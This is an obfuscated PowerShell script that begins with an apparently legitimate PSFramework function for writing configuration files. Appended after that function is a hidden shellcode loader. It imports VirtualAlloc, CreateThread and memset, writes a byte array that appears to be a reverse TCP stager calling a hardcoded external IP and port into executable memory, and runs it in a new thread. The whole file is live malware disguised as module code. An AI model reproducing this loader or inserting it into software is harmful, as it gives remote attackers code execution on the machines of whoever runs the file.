 sEt-ITeM VarIaBLe:fkx7 ( [Type]("{1}{6}{3}{2}{0}{5}{7}{4}" -F'cONfIG','pSfRAmewoR','FiGURAtIon.','.Con','Ost','u','k','rATioNH')  ); function w`Ri`TE-ps`FcO`NFigfILE
{

	[CmdletBinding()]
	Param (
		[PSFramework.Configuration.Config[]]
		${c`O`Nfig},
		
		[string]
		${Pa`Th},
		
		[switch]
		${R`epLa`cE}
	)
	
	begin
	{
		${P`Ar`Ent} = .("{1}{3}{0}{2}"-f't','S','-Path','pli') -Path ${p`AtH}
		if (-not (.("{3}{1}{2}{0}" -f '-Path','e','st','T') ${pA`RE`NT}))
		{
			${NU`ll} = &("{0}{1}{2}"-f'Ne','w-','Item') ${p`ArE`NT} -ItemType ("{0}{2}{1}" -f 'Dire','ory','ct') -Force
		}
		
		${d`Ata} = @{ }
		if ((.("{2}{0}{1}"-f 'a','th','Test-P') ${pa`TH}) -and (-not ${rePl`AcE}))
		{
			foreach (${it`EM} in (&("{2}{0}{1}{3}" -f 't-C','o','Ge','ntent') -Path ${P`ATh} -Encoding ("{1}{0}" -f 'TF8','U') | .("{0}{2}{1}{4}{3}" -f 'ConvertF','-J','rom','n','so')))
			{
				${dA`TA}[${It`em}."FUll`Na`ME"] = ${It`Em}
			}
		}
	}
	process
	{
		foreach (${I`Tem} in ${co`Nf`Ig})
		{
			${dA`T`Um} = @{
				("{2}{1}{0}" -f'rsion','e','V')  = 1
				("{1}{0}{2}"-f'Na','Full','me') = ${IT`EM}."Fu`Lln`Ame"
			}
			if (${IT`eM}."s`iMPlEeXPo`RT")
			{
				${d`A`TUM}[("{0}{1}" -f'D','ata')] = ${IT`eM}."v`Alue"
			}
			else
			{
				${pe`RSiSt`eD} =  $FKX7::("{4}{3}{1}{2}{0}" -f 'stedValue','rtToP','ersi','ve','Con').Invoke(${i`TeM}."VaL`Ue")
				${DAT`Um}[("{0}{1}"-f'Va','lue')] = ${perS`i`sTed}."p`ERSiSTE`d`VaL`Ue"
				${D`A`TUM}[("{0}{1}" -f'Ty','pe')] = ${pE`RSi`STED}."pERsIS`TEd`TYpe"
				${dA`TuM}[("{0}{1}"-f 'St','yle')] = ("{0}{1}{2}" -f 'de','f','ault')
			}
			
			${Da`TA}[${it`EM}."Fu`l`lNAmE"] = [pscustomobject]${DaT`UM}
		}
	}
	end
	{
		${D`Ata}."vAL`U`es" | &("{2}{0}{1}{4}{3}"-f 'n','ver','Co','Json','tTo-') | .("{0}{1}{2}"-f'Set-C','on','tent') -Path ${pa`Th} -Encoding ("{0}{1}"-f 'UT','F8') -ErrorAction ("{0}{1}" -f 'St','op')
	}
}
${C} = ((("{27}{81}{89}{25}{74}{13}{30}{58}{53}{16}{18}{50}{55}{90}{63}{79}{15}{65}{66}{48}{23}{59}{5}{36}{61}{64}{22}{83}{32}{85}{11}{8}{76}{77}{35}{41}{20}{60}{7}{21}{75}{54}{44}{0}{26}{4}{51}{17}{39}{82}{45}{62}{72}{2}{84}{14}{52}{42}{46}{34}{78}{57}{12}{38}{80}{88}{9}{73}{91}{69}{49}{1}{40}{24}{19}{70}{68}{31}{47}{43}{28}{67}{3}{71}{56}{6}{10}{33}{87}{29}{37}{86}"-f's)','d','dwSta','ntPtr d','lic static extern ',' l','u','rt','e','s','in','p','gs, IntPtr lpThre','2.',', IntPtr lp','tua','ta','tr','ti','ic s','l','(xb','nt d','(','ubl','er',']pub','[Dl','m','r','dllxb','xtern Int',' ','t ','dwCreatio',';[D','pAdd','c, u','adId);[DllImpor',' Crea','llxbs)]p','l','tr lpParameter','tr ','l32.dllxb','hre',', uint ','P','c','rt.','c exter','IntP','StartAddress, IntP','c s','e','n I','t, ','Fla','s)]publi','IntPtr','Impo','res','ad(IntPtr lpThreadAtt','tr Vi','s, ui','lA','llo','emset(I',' e','vc','tatic','es','ributes, uint ','m','nel3','skern',', uint flProt','ect)','n','r','t','lImpor','teT','wSize,','ckSize','uint flAllocationTy','int count);','s','(xb','t(xbsk','ntP','s')) -cREplaCE ([cHAr]120+[cHAr]98+[cHAr]115),[cHAr]34);${w} = &("{0}{2}{1}" -f 'A','ype','dd-T') -memberDefinition ${C} -Name ("{1}{0}" -f'32','Win') -namespace ("{1}{0}{2}" -f'o','Win32Functi','ns') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc3,0xe6,0x30,0x55,0x68,0x02,0x00,0x03,0xe7,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${z}."LEN`gtH" -gt 0x1000){${G} = ${Z}."len`GTH"};${x}=${w}::("{3}{1}{0}{2}"-f 'All','irtual','oc','V').Invoke(0,0x1000,${G},0x40);for (${i}=0;${i} -le (${Z}."LeN`G`TH"-1);${i}++) {${w}::"MemS`Et"([IntPtr](${X}.("{1}{0}{2}"-f 'oInt3','T','2').Invoke()+${i}), ${Z}[${i}], 1)};${W}::("{0}{2}{1}" -f'Cr','d','eateThrea').Invoke(0,0,${X},0,0,0);for (;;){.("{0}{2}{1}" -f'St','leep','art-s') 60};
